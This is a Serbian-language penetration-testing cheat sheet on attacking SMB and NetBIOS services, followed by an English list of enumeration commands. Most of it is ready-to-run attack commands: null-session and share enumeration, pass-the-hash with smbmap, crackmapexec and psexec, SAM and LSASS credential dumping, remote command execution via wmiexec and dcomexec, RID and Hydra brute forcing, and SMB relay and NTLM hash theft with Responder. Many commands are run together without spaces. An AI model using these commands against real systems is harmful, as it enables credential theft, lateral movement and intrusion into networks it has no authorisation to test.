Network Basic Input Output System (NetBIOS) je softverski protokol dizajniran da omogući aplikacijama, računarima i desktop računarima unutar lokalne mreže (LAN) da interaguju sa mrežnom opremom i olakšaju prenos podataka preko mreže. Identifikacija i lokacija softverskih aplikacija koje rade na NetBIOS mreži postiže se putem njihovih NetBIOS imena, koja mogu biti do 16 karaktera i često su različita od imena računara. NetBIOS sesija između dve aplikacije se inicira kada jedna aplikacija (kao klijent) izda komandu da "pozove" drugu aplikaciju (kao server) koristeći TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Tehnički, Port 139 se naziva 'NBT preko IP-a', dok se Port 445 identifikuje kao 'SMB preko IP-a'. Akronim SMB označava 'Server Message Blocks', koji je takođe poznat kao Common Internet File System (CIFS). Kao protokol mrežnog sloja aplikacije, SMB/CIFS se uglavnom koristi za omogućavanje deljenog pristupa datotekama, štampačima, serijskim portovima, i olakšavanje različitih oblika komunikacije između čvorova na mreži.
Na primer, u kontekstu Windows-a, ističe se da SMB može direktno raditi preko TCP/IP, eliminišući potrebu za NetBIOS preko TCP/IP-a, kroz korišćenje porta 445. Nasuprot tome, na različitim sistemima, primećuje se korišćenje porta 139, što ukazuje da se SMB izvršava zajedno sa NetBIOS-om preko TCP/IP-a.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Server Message Block (SMB) protokol, koji radi u klijent-server modelu, namenjen je za regulisanje pristupa fajlovima, direktorijumima i drugim mrežnim resursima poput štampača i rutera. Prvenstveno se koristi u seriji operativnih sistema Windows, SMB osigurava kompatibilnost unazad, omogućavajući uređajima sa novijim verzijama Microsoft-ovog operativnog sistema da se bez problema povežu sa onima koji koriste starije verzije. Dodatno, projekat Samba nudi besplatno softversko rešenje, omogućavajući implementaciju SMB-a na Linux i Unix sistemima, čime se olakšava komunikacija između platformi putem SMB-a.
Deljenja, koja predstavljaju proizvoljne delove lokalnog fajl sistema, mogu biti obezbeđena od strane SMB servera, čime se hijerarhija čini vidljivom klijentu delimično nezavisno od stvarne strukture servera. Access Control Lists (ACLs), koje definišu prava pristupa, omogućavaju detaljnu kontrolu nad korisničkim dozvolama, uključujući atribute poput execute, read i full access. Ova prava mogu biti dodeljena pojedinačnim korisnicima ili grupama, zasnovanim na deljenjima, i razlikuju se od lokalnih dozvola postavljenih na serveru.
Deljenje IPC$
Pristup deljenju IPC$ može se dobiti putem anonimne nule sesije, omogućavajući interakciju sa uslugama izloženim putem imenovanih cevi. Alat enum4linux je koristan u tu svrhu. Pravilno korišćen, omogućava dobijanje:
Informacija o operativnom sistemu
Detalja o nadređenom domenu
Kompilaciju lokalnih korisnika i grupa
Informacija o dostupnim SMB deljenjima
Efikasnu politiku sistema bezbednosti
Ova funkcionalnost je ključna za mrežne administratore i bezbednosne stručnjake kako bi procenili bezbednosni položaj SMB (Server Message Block) usluga na mreži. enum4linux pruža sveobuhvatan pregled SMB okruženja ciljnog sistema, što je ključno za identifikaciju potencijalnih ranjivosti i osiguravanje da su SMB usluge pravilno zaštićene.
enum4linux-atarget_ip
Gornja komanda je primer kako se enum4linux može koristiti za izvođenje potpune enumeracije protiv cilja navedenog pomoću target_ip.
Šta je NTLM
Ako ne znate šta je NTLM ili želite da saznate kako funkcioniše i kako se može zloupotrebiti, naći ćete veoma interesantnu ovu stranicu o NTLM gde je objašnjeno kako ovaj protokol funkcioniše i kako možete iskoristiti to:
Da biste pronašli moguće eksploate za SMB verziju, važno je znati koja verzija se koristi. Ako ove informacije ne postoje u drugim korišćenim alatima, možete:
Koristiti MSF pomoćni modul _auxiliary/scanner/smb/smb_version
Ili ovaj skript:
#!/bin/sh#Author: rewardone#Description:# Requires root or enough permissions to use tcpdump# Will listen for the first 7 packets of a null login# and grab the SMB Version#Notes:# Will sometimes not capture or will print multiple# lines. May need to run a second time for success.if [ -z $1 ]; thenecho"Usage: ./smbver.sh RHOST {RPORT}"&&exit; else rhost=$1; fiif [ !-z $2 ]; then rport=$2; else rport=139; fitcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo"exit"|smbclient-L $rhost 1>/dev/null2>/dev/nullecho""&&sleep.1
#Dump interesting informationenum4linux-a [-u "<username>"-p"<passwd>"]<IP>enum4linux-ng-A [-u "<username>"-p"<passwd>"]<IP>nmap--script"safe or smb-enum-*"-p445<IP>#Connect to the rpcrpcclient-U""-N<IP>#No credsrpcclient//machine.htb-Udomain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb--pw-nt-hashrpcclient-U"username%passwd"<IP>#With creds#You can use querydispinfo and enumdomusers to query user information#Dump user information/usr/share/doc/python3-impacket/examples/samrdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/samrdump.py-port445 [[domain/]username[:password]@]<targetName or address>#Map possible RPC endpoints/usr/share/doc/python3-impacket/examples/rpcdump.py-port135 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port445 [[domain/]username[:password]@]<targetName or address>
Nabrojavanje Korisnika, Grupa i Prijavljenih Korisnika
Ove informacije već bi trebalo da budu prikupljene pomoću enum4linux i enum4linux-ng
U prozoru pregledača fajlova (nautilus, thunar, itd)
smb://friendzone.htb/general/
Enumeracija deljenih foldera
Lista deljenih foldera
Uvek je preporučljivo proveriti da li možete pristupiti bilo čemu, ako nemate akreditive pokušajte koristeći nullakreditive/gost korisnika.
smbclient--no-pass-L//<IP># Null usersmbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap-H<IP> [-P <PORT>]#Null usersmbmap-u"username"-p"password"-H<IP> [-P <PORT>]#Credssmbmap-u"username"-p"<NT>:<LM>"-H<IP> [-P <PORT>]#Pass-the-Hashsmbmap-R-u"username"-p"password"-H<IP> [-P <PORT>]#Recursive listcrackmapexecsmb<IP>-u''-p''--shares#Null usercrackmapexecsmb<IP>-u'username'-p'password'--shares#Guest usercrackmapexecsmb<IP>-u'username'-H'<HASH>'--shares#Guest user
Poveži/Navedi deljeni folder
#Connect using smbclientsmbclient--no-pass//<IP>/<Folder>smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient#List with smbmap, without folder it list everythingsmbmap [-u "username"-p"password"]-R [Folder] -H <IP> [-P <PORT>] # Recursive listsmbmap [-u "username"-p"password"]-r [Folder] -H <IP> [-P <PORT>] # Non-Recursive listsmbmap-u"username"-p"<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ručno nabrajanje Windows deljenih resursa i povezivanje sa njima
Moguće je da ste ograničeni da prikažete bilo koje deljene resurse na glavnom računaru i kada pokušate da ih nabrojite, može se činiti da ne postoji nijedan deo na koji možete da se povežete. Stoga bi vredelo pokušati ručno se povezati sa deljenim resursom. Da biste ručno nabrojali deljene resurse, možda ćete želeti da tražite odgovore poput NT_STATUS_ACCESS_DENIED i NT_STATUS_BAD_NETWORK_NAME, kada koristite validnu sesiju (npr. praznu sesiju ili validne akreditive). Ovi odgovori mogu ukazivati da li deo postoji i da nemate pristup njemu ili deo uopšte ne postoji.
Uobičajena imena deljenih resursa za Windows ciljeve su
C$
D$
ADMIN$
IPC$
PRINT$
FAX$
SYSVOL
NETLOGON
(Uobičajena imena deljenih resursa iz Procene bezbednosti mreže 3. izdanje)
Možete pokušati da se povežete sa njima koristeći sledeću komandu
smbclient-U'%'-N \\\\<IP>\\<SHARE># null session to connect to a windows sharesmbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
za ovaj skript (koristeći null sesiju)
#/bin/baship='<TARGET-IP-HERE>'shares=('C$''D$''ADMIN$''IPC$''PRINT$''FAX$''SYSVOL''NETLOGON')for share in ${shares[*]}; dooutput=$(smbclient-U '%' -N \\\\$ip\\$share -c '')if [[ -z $output ]]; thenecho "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
elseecho $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)fidone
primeri
smbclient-U'%'-N \\\\192.168.0.24\\im_clearly_not_here# returns NT_STATUS_BAD_NETWORK_NAMEsmbclient-U'%'-N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Nabrajajte deljenja sa Windows / bez alata treće strane
PowerShell
# Retrieves the SMB shares on the locale computer.Get-SmbShareGet-WmiObject-Class Win32_Share# Retrieves the SMB shares on a remote computer.get-smbshare-CimSession "<computer name or session object>"# Retrieves the connections established from the local SMB client to the SMB servers.Get-SmbConnection
CMD konzola
# List shares on the local computernetshare# List shares on a remote computer (including hidden ones)netview \\<ip>/all
Posebno interesantni sa deljenja su fajlovi nazvani Registry.xml jer mogu da sadrže lozinke za korisnike konfigurisane sa autologon putem Grupe politika. Ili web.config fajlovi jer sadrže akreditive.
SYSVOL deljenje je čitljivo od strane svih autentifikovanih korisnika u domenu. Tamo možete pronaći mnoge različite batch, VBScript i PowerShell skripte.
Trebalo bi da proverite skripte unutar njega jer biste mogli pronaći osetljive informacije poput lozinki.
Čitanje Registra
Možda ćete moći da pročitate registar koristeći neke otkrivene akreditive. Impacket reg.py vam omogućava da pokušate:
crackmapexec može izvršiti komande zloupotrebljavajući bilo koji od mmcexec, smbexec, atexec, wmiexec pri čemu je wmiexec metoda podrazumevana. Možete naznačiti koju opciju želite da koristite pomoću parametra --exec-method:
apt-getinstallcrackmapexeccrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-X'$PSVersionTable'#Execute Powershellcrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-xwhoami#Excute cmdcrackmapexecsmb192.168.10.11-uAdministrator-H<NTHASH>-xwhoami#Pass-the-Hash# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sam#Dump SAMcrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--lsa#Dump LSASS in memmory hashescrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sessions#Get sessions (crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--loggedon-users#Get logged-on userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--disks#Enumerate the diskscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--users#Enumerate userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--groups# Enumerate groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--local-groups# Enumerate local groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--pass-pol#Get password policycrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--rid-brute#RID brutecrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-H<HASH>#Pass-The-Hash
Oba opcije će kreirati novu uslugu (koristeći \pipe\svcctl putem SMB-a) na računaru žrtve i koristiće je da nešto izvrše (psexec će prebaciti izvršni fajl na ADMIN$ deljenje, a smbexec će pokazati na cmd.exe/powershell.exe i staviti u argumente payload --tehnika bez fajla--).
Više informacija o psexec i smbexec.
Na kali se nalazi u /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./psexec.py [[domain/]username[:password]@]<targetName or address>./psexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hashpsexec \\192.168.122.66-uAdministrator-p123456Wwpsexec \\192.168.122.66-uAdministrator-pq23q34t34twd3w34t34wtw34t# Use pass the hash
Korišćenjem parametra-k možete autentifikovati protiv kerberosa umesto NTLM
Tajno izvršite komandnu liniju bez dodira sa diskom ili pokretanja novog servisa korišćenjem DCOM-a preko porta 135.
U kali-ju se nalazi na /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./wmiexec.py [[domain/]username[:password]@]<targetName or address>#Prompt for password./wmiexec.py-hashesLM:NTadministrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Korišćenjem parametra-k možete se autentifikovati preko kerberosa umesto NTLM.
#If no password is provided, it will be prompted./dcomexec.py [[domain/]username[:password]@]<targetName or address>./dcomexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Ovo se ne preporučuje, možete blokirati nalog ako premašite maksimalan dozvoljeni broj pokušaja
nmap--scriptsmb-brute-p445<IP>ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
Napad preusmeravanja SMB-a
Ovaj napad koristi Responder alat za hvatanje SMB autentikacionih sesija na internoj mreži, i preusmerava ih na ciljani uređaj. Ako je autentikaciona sesija uspešna, automatski će vas prebaciti u sistemskishell.
Više informacija o ovom napadu ovde.
SMB-Trap
Windows biblioteka URLMon.dll automatski pokušava da se autentikuje na hostu kada stranica pokuša da pristupi nekom sadržaju putem SMB-a, na primer: img src="\\10.10.10.10\path\image.jpg"
Ovo se dešava sa funkcijama:
URLDownloadToFile
URLDownloadToCache
URLOpenStream
URLOpenBlockingStream
Koje koriste neki pregledači i alati (kao što je Skype)
SMBTrap korišćenjem MitMf
NTLM Krađa
Slično kao kod SMB preusmeravanja, postavljanje zlonamernih fajlova na ciljni sistem (putem SMB-a, na primer) može izazvati pokušaj SMB autentikacije, omogućavajući da se NetNTLMv2 heš presretne alatom poput Responder-a. Heš se zatim može dešifrovati offline ili koristiti u napadu preusmeravanja SMB-a.
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
